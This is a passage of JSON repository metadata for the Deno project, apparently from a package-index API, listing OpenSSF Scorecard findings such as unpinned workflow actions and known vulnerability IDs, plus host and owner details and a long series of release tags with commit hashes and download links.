https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.c